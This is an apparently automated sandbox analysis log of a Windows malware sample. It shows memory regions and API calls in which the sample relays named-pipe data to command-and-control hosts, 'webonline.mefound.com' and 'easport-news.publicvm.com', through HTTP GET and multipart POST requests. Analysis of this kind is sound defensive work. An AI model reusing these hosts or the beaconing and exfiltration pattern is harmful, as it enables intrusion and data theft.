= 0x74650000 end_va = 0x7465cfff entry_point = 0x74650000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 3593 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 3594 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 3595 start_va = 0x72d70000 end_va = 0x72d75fff entry_point = 0x72d70000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 3596 start_va = 0xdb0000 end_va = 0xeaffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 3597 start_va = 0x74240000 end_va = 0x7424ffff entry_point = 0x74240000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 3598 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 3599 start_va = 0x1ca0000 end_va = 0x1e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3600 start_va = 0xeb0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 3601 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 3602 start_va = 0x75e20000 end_va = 0x75e2bfff entry_point = 0x75e20000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3603 start_va = 0x1ea0000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 3604 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 3605 start_va = 0x6f850000 end_va = 0x6f855fff entry_point = 0x6f850000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 3606 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 3607 start_va = 0xc90000 end_va = 0xd8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 3608 start_va = 0x1d40000 end_va = 0x1e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 3609 start_va = 0x1e40000 end_va = 0x1e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 3610 start_va = 0x77600000 end_va = 0x77682fff entry_point = 0x77600000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3611 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 3612 start_va = 0x890000 end_va = 0x890fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 3613 start_va = 0x70600000 end_va = 0x70659fff entry_point = 0x70600000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 3614 start_va = 0xeb0000 end_va = 0xfaffff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 3615 start_va = 0xfd0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 3616 start_va = 0x75740000 end_va = 0x7577afff entry_point = 0x75740000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3617 start_va = 0x759a0000 end_va = 0x759b5fff entry_point = 0x759a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3618 start_va = 0x75ec0000 end_va = 0x75ecdfff entry_point = 0x75ec0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3619 start_va = 0x2000000 end_va = 0x20fffff entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 3620 start_va = 0x6efd0000 end_va = 0x6efd7fff entry_point = 0x6efd0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 3621 start_va = 0x748c0000 end_va = 0x748cffff entry_point = 0x748c0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 3622 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 3623 start_va = 0x74890000 end_va = 0x748a1fff entry_point = 0x74890000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 3624 start_va = 0x75960000 end_va = 0x7599bfff entry_point = 0x75960000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3625 start_va = 0x74880000 end_va = 0x74887fff entry_point = 0x74880000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 3626 start_va = 0x754b0000 end_va = 0x754b4fff entry_point = 0x754b0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 3627 start_va = 0x75950000 end_va = 0x75955fff entry_point = 0x75950000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 3628 start_va = 0x73fe0000 end_va = 0x74017fff entry_point = 0x73fe0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3629 start_va = 0x8a0000 end_va = 0x8a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 3630 start_va = 0x2200000 end_va = 0x223ffff entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 3631 start_va = 0x75420000 end_va = 0x75428fff entry_point = 0x75420000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3632 start_va = 0x8b0000 end_va = 0x8b6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 3633 start_va = 0x8c0000 end_va = 0x8c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 3634 start_va = 0x8d0000 end_va = 0x8d7fff entry_point = 0x8d0000 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 3640 start_va = 0x22b0000 end_va = 0x23affff entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 3641 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Thread: id = 194 os_tid = 0xfe0 Thread: id = 195 os_tid = 0xfe4 [0080.455] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0080.455] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x77720000 [0080.455] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0080.455] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0080.455] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0080.455] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0080.455] GetProcAddress (hModule=0x77720000, lpProcName="realloc") returned 0x7772b10d [0080.455] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0080.455] GetProcAddress (hModule=0x77720000, lpProcName="sprintf") returned 0x7773d354 [0080.455] GetProcAddress (hModule=0x77720000, lpProcName="srand") returned 0x7772f757 [0080.456] GetProcAddress (hModule=0x77720000, lpProcName="rand") returned 0x7772c070 [0080.456] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0080.456] GetProcAddress (hModule=0x77720000, lpProcName="_vsnprintf") returned 0x7772d1a8 [0080.456] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0080.456] GetProcAddress (hModule=0x77720000, lpProcName="strtok") returned 0x7772df1f [0080.456] GetProcAddress (hModule=0x77720000, lpProcName="strcmp") returned 0x77738b11 [0080.456] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0080.456] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0080.456] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0080.456] GetProcAddress (hModule=0x761d0000, lpProcName="CreateNamedPipeW") returned 0x7620270f [0080.456] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileW") returned 0x7621cc56 [0080.456] GetProcAddress (hModule=0x761d0000, lpProcName="SetNamedPipeHandleState") returned 0x7622f420 [0080.456] GetProcAddress (hModule=0x761d0000, lpProcName="SetEvent") returned 0x7621bccc [0080.456] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0080.456] GetProcAddress (hModule=0x761d0000, lpProcName="GetOverlappedResult") returned 0x76212f04 [0080.456] GetProcAddress (hModule=0x761d0000, lpProcName="ConnectNamedPipe") returned 0x76202727 [0080.456] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0080.456] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0080.456] GetProcAddress (hModule=0x761d0000, lpProcName="FlushFileBuffers") returned 0x76207f81 [0080.456] GetProcAddress (hModule=0x761d0000, lpProcName="DisconnectNamedPipe") returned 0x7622f438 [0080.456] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0080.456] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0080.456] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0080.457] GetProcAddress (hModule=0x761d0000, lpProcName="OpenEventW") returned 0x7621548b [0080.457] GetProcAddress (hModule=0x761d0000, lpProcName="ResetEvent") returned 0x7621bcb4 [0080.457] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemTime") returned 0x7621ced8 [0080.457] GetProcAddress (hModule=0x761d0000, lpProcName="ExitProcess") returned 0x7622214f [0080.457] GetProcAddress (hModule=0x761d0000, lpProcName="SetLastError") returned 0x7621bb08 [0080.457] GetProcAddress (hModule=0x761d0000, lpProcName="OutputDebugStringA") returned 0x7620eb36 [0080.457] LoadLibraryW (lpLibFileName="WinInet.dll") returned 0x76600000 [0080.466] GetProcAddress (hModule=0x76600000, lpProcName="HttpSendRequestExA") returned 0x76691812 [0080.466] GetProcAddress (hModule=0x76600000, lpProcName="HttpQueryInfoA") returned 0x7661a33e [0080.466] GetProcAddress (hModule=0x76600000, lpProcName="InternetConnectA") returned 0x766249e9 [0080.466] GetProcAddress (hModule=0x76600000, lpProcName="InternetReadFile") returned 0x7661b406 [0080.466] GetProcAddress (hModule=0x76600000, lpProcName="InternetWriteFile") returned 0x766346da [0080.467] GetProcAddress (hModule=0x76600000, lpProcName="HttpOpenRequestA") returned 0x76624c7d [0080.467] GetProcAddress (hModule=0x76600000, lpProcName="HttpEndRequestA") returned 0x766345ea [0080.467] GetProcAddress (hModule=0x76600000, lpProcName="HttpAddRequestHeadersA") returned 0x7661dcd2 [0080.467] GetProcAddress (hModule=0x76600000, lpProcName="HttpSendRequestA") returned 0x766918f8 [0080.467] GetProcAddress (hModule=0x76600000, lpProcName="InternetOpenA") returned 0x7662f18e [0080.467] GetProcAddress (hModule=0x76600000, lpProcName="InternetCloseHandle") returned 0x7661ab49 [0080.467] GetProcAddress (hModule=0x76600000, lpProcName="InternetQueryOptionA") returned 0x76611b56 [0080.467] GetProcAddress (hModule=0x76600000, lpProcName="InternetSetOptionA") returned 0x766175e8 [0080.467] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x77830000 [0080.467] GetProcAddress (hModule=0x77830000, lpProcName="ObtainUserAgentString") returned 0x77861d76 [0080.467] GetComputerNameW (in: lpBuffer=0x27f664, nSize=0x27f888 | out: lpBuffer="CRH2YWU7", nSize=0x27f888) returned 1 [0080.467] _snwprintf (in: _Dest=0x27f8c0, _Count=0x104, _Format="\\\\.\\pipe\\%08x" | out: _Dest="\\\\.\\pipe\\c41b2304") returned 17 [0080.467] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x64 [0080.468] CreateNamedPipeW (lpName="\\\\.\\pipe\\c41b2304" (normalized: "\\device\\namedpipe\\c41b2304"), dwOpenMode=0x40000003, dwPipeMode=0x6, nMaxInstances=0x1, nOutBufferSize=0x200, nInBufferSize=0x200, nDefaultTimeOut=0x3e8, lpSecurityAttributes=0x0) returned 0x60 [0080.468] GetComputerNameW (in: lpBuffer=0x27f674, nSize=0x27f888 | out: lpBuffer="CRH2YWU7", nSize=0x27f888) returned 1 [0080.468] _snwprintf (in: _Dest=0x27fac8, _Count=0x104, _Format="%08x" | out: _Dest="c41b2305") returned 8 [0080.468] OpenEventW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="c41b2305") returned 0x68 [0080.468] ConnectNamedPipe (in: hNamedPipe=0x60, lpOverlapped=0x3d1230 | out: lpOverlapped=0x3d1230) returned 0 [0080.468] GetLastError () returned 0x3e5 [0080.468] SetEvent (hEvent=0x68) returned 1 [0080.468] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0080.474] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x3d1230, lpNumberOfBytesTransferred=0x27f8bc, bWait=0 | out: lpNumberOfBytesTransferred=0x27f8bc) returned 1 [0080.474] ResetEvent (hEvent=0x68) returned 1 [0080.475] ReadFile (in: hFile=0x60, lpBuffer=0x26f884, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x27f888, lpOverlapped=0x3d1230 | out: lpBuffer=0x26f884*, lpNumberOfBytesRead=0x27f888*=0x84, lpOverlapped=0x3d1230) returned 1 [0080.475] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0080.475] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x3d1230, lpNumberOfBytesTransferred=0x27f888, bWait=0 | out: lpNumberOfBytesTransferred=0x27f888) returned 1 [0080.475] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x27affc, cbSize=0x27b7fc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", cbSize=0x27b7fc) returned 0x0 [0080.479] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0080.518] InternetConnectA (hInternet=0xcc0004, lpszServerName="webonline.mefound.com", nServerPort=0x0, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0080.518] InternetQueryOptionA (in: hInternet=0xcc0004, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x27b800 | out: lpBuffer=0x0, lpdwBufferLength=0x27b800) returned 0 [0080.519] InternetQueryOptionA (in: hInternet=0xcc0004, dwOption=0x26, lpBuffer=0x3df938, lpdwBufferLength=0x27b800 | out: lpBuffer=0x3df938, lpdwBufferLength=0x27b800) returned 1 [0080.519] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="index/index.php?h=8NavN1UHP1o%3d&d=8Naq1O4ZqFrw16AGYzEOb8jkmgBlNA9uwOavN1UHP1rw1q83VQd%3d", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x4400000, dwContext=0x0) returned 0xcc000c [0080.519] SetLastError (dwErrCode=0x0) [0080.519] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x27f848, dwBufferLength=0x4) returned 1 [0080.519] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x2, lpBuffer=0x27f848, dwBufferLength=0x4) returned 1 [0080.519] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x27f848, dwBufferLength=0x4) returned 1 [0080.519] strlen (_Str="Accept: */*") returned 0xb [0080.519] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: */*", dwHeadersLength=0xb, dwModifiers=0x20000000) returned 1 [0080.519] SetLastError (dwErrCode=0x0) [0080.519] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0082.134] GetLastError () returned 0x0 [0082.134] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x27f820, lpdwBufferLength=0x27f81c, lpdwIndex=0x0 | out: lpBuffer=0x27f820*, lpdwBufferLength=0x27f81c*=0x4, lpdwIndex=0x0) returned 1 [0082.134] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0082.134] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0082.134] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0082.135] WriteFile (in: hFile=0x60, lpBuffer=0x3dffc8*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x27f82c, lpOverlapped=0x3d1230 | out: lpBuffer=0x3dffc8*, lpNumberOfBytesWritten=0x27f82c*=0xd, lpOverlapped=0x3d1230) returned 1 [0082.135] DisconnectNamedPipe (hNamedPipe=0x60) returned 1 [0082.135] ConnectNamedPipe (in: hNamedPipe=0x60, lpOverlapped=0x3d1230 | out: lpOverlapped=0x3d1230) returned 0 [0082.135] GetLastError () returned 0x3e5 [0082.135] SetEvent (hEvent=0x68) returned 1 [0082.135] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0082.145] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x3d1230, lpNumberOfBytesTransferred=0x27f8bc, bWait=0 | out: lpNumberOfBytesTransferred=0x27f8bc) returned 1 [0082.145] ResetEvent (hEvent=0x68) returned 1 [0082.145] ReadFile (in: hFile=0x60, lpBuffer=0x26f884, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x27f888, lpOverlapped=0x3d1230 | out: lpBuffer=0x26f884*, lpNumberOfBytesRead=0x27f888*=0x10af, lpOverlapped=0x3d1230) returned 1 [0082.145] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0082.145] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x3d1230, lpNumberOfBytesTransferred=0x27f888, bWait=0 | out: lpNumberOfBytesTransferred=0x27f888) returned 1 [0082.145] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x27a994, cbSize=0x27b194 | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", cbSize=0x27b194) returned 0x0 [0082.145] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0082.145] InternetConnectA (hInternet=0xcc0004, lpszServerName="easport-news.publicvm.com", nServerPort=0x0, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0082.146] InternetQueryOptionA (in: hInternet=0xcc0004, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x27b198 | out: lpBuffer=0x0, lpdwBufferLength=0x27b198) returned 0 [0082.146] InternetQueryOptionA (in: hInternet=0xcc0004, dwOption=0x26, lpBuffer=0x3dffc8, lpdwBufferLength=0x27b198 | out: lpBuffer=0x3dffc8, lpdwBufferLength=0x27b198) returned 1 [0082.146] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="index/index.php?h=O2i1voZ4%2bOQ%3d&d=OWiwXT1mb%2bQ7abqPsE7J0QNagIm2S8jQC1i1voZ4%2bOQ7aLW%2bhnjJ0g1ZgIa0Tc%2fUCFiBjrY8ydYJXYGHtEHI0BUCxdmmWNjEG0iVnqZY2MQbSJWepljYxM%3d%3d", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x4400000, dwContext=0x0) returned 0xcc000c [0082.146] SetLastError (dwErrCode=0x0) [0082.146] GetSystemTime (in: lpSystemTime=0x27f748 | out: lpSystemTime=0x27f748*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0x1d, wHour=0xd, wMinute=0x7, wSecond=0xe, wMilliseconds=0x333)) [0082.146] srand (_Seed=0x333) [0082.146] rand () returned 2713 [0082.146] rand () returned 28840 [0082.146] rand () returned 4698 [0082.146] rand () returned 16723 [0082.146] sprintf (in: _Dest=0x27f6ec, _Format="---------------------------%x%x%x%x" | out: _Dest="---------------------------4153125a70a8a99") returned 42 [0082.146] sprintf (in: _Dest=0x27f5b8, _Format="Content-Type: multipart/form-data; boundary=%s\r\n" | out: _Dest="Content-Type: multipart/form-data; boundary=---------------------------4153125a70a8a99\r\n") returned 88 [0082.146] strlen (_Str="Content-Type: multipart/form-data; boundary=---------------------------4153125a70a8a99\r\n") returned 0x58 [0082.146] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=---------------------------4153125a70a8a99\r\n", dwHeadersLength=0x58, dwModifiers=0x20000000) returned 1 [0082.146] SetLastError (dwErrCode=0x0) [0082.146] sprintf (in: _Dest=0x27f1b8, _Format="--%s\r\nContent-Disposition: form-data; name=\"array\"\r\nContent-Type: application/octet-stream\r\n\r\n" | out: _Dest="-----------------------------4153125a70a8a99\r\nContent-Disposition: form-data; name=\"array\"\r\nContent-Type: application/octet-stream\r\n\r\n") returned 134 [0082.146] sprintf (in: _Dest=0x27f3b8, _Format="\r\n--%s--\r\n" | out: _Dest="\r\n-----------------------------4153125a70a8a99--\r\n") returned 50 [0082.146] strlen (_Str="\r\n-----------------------------4153125a70a8a99--\r\n") returned 0x32 [0082.146] strlen (_Str="-----------------------------4153125a70a8a99\r\nContent-Disposition: form-data; name=\"array\"\r\nContent-Type: application/octet-stream\r\n\r\n") returned 0x86 [0082.146] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x27f838, dwBufferLength=0x4) returned 1 [0082.146] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x2, lpBuffer=0x27f838, dwBufferLength=0x4) returned 1 [0082.146] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x27f838, dwBufferLength=0x4) returned 1 [0082.146] HttpSendRequestExA (in: hRequest=0xcc000c, lpBuffersIn=0x27f720, lpBuffersOut=0x0, dwFlags=0x8, dwContext=0x0 | out: lpBuffersOut=0x0) returned 1 [0082.773] strlen (_Str="-----------------------------4153125a70a8a99\r\nContent-Disposition: form-data; name=\"array\"\r\nContent-Type: application/octet-stream\r\n\r\n") returned 0x86 [0082.773] InternetWriteFile (in: hFile=0xcc000c, lpBuffer=0x27f1b8*, dwNumberOfBytesToWrite=0x86, lpdwNumberOfBytesWritten=0x27f83c | out: lpBuffer=0x27f1b8*, lpdwNumberOfBytesWritten=0x27f83c*=0x86) returned 1 [0082.774] InternetWriteFile (in: hFile=0xcc000c, lpBuffer=0xc90b4b*, dwNumberOfBytesToWrite=0xfa4, lpdwNumberOfBytesWritten=0x27f83c | out: lpBuffer=0xc90b4b*, lpdwNumberOfBytesWritten=0x27f83c*=0xfa4) returned 1 [0082.774] strlen (_Str="\r\n-----------------------------4153125a70a8a99--\r\n") returned 0x32 [0082.774] InternetWriteFile (in: hFile=0xcc000c, lpBuffer=0x27f3b8*, dwNumberOfBytesToWrite=0x32, lpdwNumberOfBytesWritten=0x27f83c | out: lpBuffer=0x27f3b8*, lpdwNumberOfBytesWritten=0x27f83c*=0x32) returned 1 [0082.774] HttpEndRequestA (in: hRequest=0xcc000c, lpBuffersOut=0x0, dwFlags=0x8, dwContext=0x0 | out: lpBuffersOut=0x0) returned 1 [0083.543] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x27f75c, lpdwBufferLength=0x27f758, lpdwIndex=0x0 | out: lpBuffer=0x27f75c*, lpdwBufferLength=0x27f758*=0x4, lpdwIndex=0x0) returned 1 [0083.543] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x27f75c, lpdwBufferLength=0x27f758, lpdwIndex=0x0 | out: lpBuffer=0x27f75c*, lpdwBufferLength=0x27f758*=0x4, lpdwIndex=0x0) returned 1 [0083.543] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x27b1b8, dwNumberOfBytesToRead=0x4000, lpdwNumberOfBytesRead=0x27f83c | out: lpBuffer=0x27b1b8*, lpdwNumberOfBytesRead=0x27f83c*=0x130) returned 1 [0083.543] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x27b1b8, dwNumberOfBytesToRead=0x4000, lpdwNumberOfBytesRead=0x27f83c | out: lpBuffer=0x27b1b8*, lpdwNumberOfBytesRead=0x27f83c*=0x0) returned 1 [0083.543] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0083.543] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0083.543] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0083.543] WriteFile (in: hFile=0x60, lpBuffer=0xc91af8*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x27f830, lpOverlapped=0x3d1230 | out: lpBuffer=0xc91af8*, lpNumberOfBytesWritten=0x27f830*=0x134, lpOverlapped=0x3d1230) returned 1 [0083.544] DisconnectNamedPipe (hNamedPipe=0x60) returned 1 [0083.544] ConnectNamedPipe (in: hNamedPipe=0x60, lpOverlapped=0x3d1230 | out: lpOverlapped=0x3d1230) returned 0 [0083.544] GetLastError () returned 0x3e5 [0083.544] SetEvent (hEvent=0x68) returned 1 [0083.544] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0083.550] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x3d1230, lpNumberOfBytesTransferred=0x27f8bc, bWait=0 | out: lpNumberOfBytesTransferred=0x27f8bc) returned 1 [0083.550] ResetEvent (hEvent=0x68) returned 1 [0083.550] ReadFile (in: hFile=0x60, lpBuffer=0x26f884, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x27f888, lpOverlapped=0x3d1230 | out: lpBuffer=0x26f884*, lpNumberOfBytesRead=0x27f888*=0x8, lpOverlapped=0x3d1230) returned 1 [0083.550] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0083.550] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x3d1230, lpNumberOfBytesTransferred=0x27f888, bWait=0 | out: lpNumberOfBytesTransferred=0x27f888) returned 1 [0083.550] DisconnectNamedPipe (hNamedPipe=0x60) returned 1 [0083.550] ExitProcess (uExitCode=0x0) Thread: id = 196 os_tid = 0xfe8 Thread: id = 197 os_tid = 0xfec Thread: id = 198 os_tid = 0xff0 Thread: id = 199 os_tid = 0xff4 Thread: id = 200 os_tid = 0xff8 Thread: id = 201 os_tid = 0xffc Thread: id = 202 os_tid = 0x114 Process: id = "77" image_name = "firefox.exe" filename = "c:\\program files\\mozilla firefox\\firefox.exe" page_root = "0x7ef4f6c0" os_pid = "0x840" os_integrity_level = "0x3000" os_privileges = "0x60800000" 